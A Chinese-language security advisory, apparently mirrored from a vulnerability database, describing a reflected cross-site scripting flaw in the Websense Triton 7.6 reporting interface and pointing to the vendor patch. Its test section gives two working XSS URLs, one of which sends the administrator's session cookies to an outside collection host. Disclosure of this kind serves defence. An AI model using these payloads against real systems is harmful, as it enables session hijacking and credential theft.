Websense Triton报告管理界面跨站脚本执行漏洞


发布日期:2011-12-15
更新日期:2012-05-03

受影响系统:
Websense Web Security Gateway Anywhere 7.6
Websense Web Filter 7.6
Websense Web Security 7.6
Websense Web Security Gateway 7.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51085

Websense是网络过滤器产品。Websense Triton是内容安全解决方案。

Websense (Triton 7.6)在启用了身份验证会话令牌捕获的报告管理UI的实现上存在反射XSS,可允许攻击者访问报告UI或在管理员浏览器和Websense管理UI背景下运行任意JavaScript,窃取Cookie身份验证凭证。

<*来源:Ben Williams
 
  链接:http://www.securityfocus.com/archive/1/520889
        http://packetstormsecurity.org/files/112359/NGS00137-1.txt
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Ben Williams ()提供了如下测试方法:

https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360

Send the current session-cookies to a credentials-collection server:

https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http://192.168.1.64/"%2bencodeURIComponent(document.cookie))</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360

建议:
--------------------------------------------------------------------------------
厂商补丁:

Websense
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.websense.com/global/en/

相关内容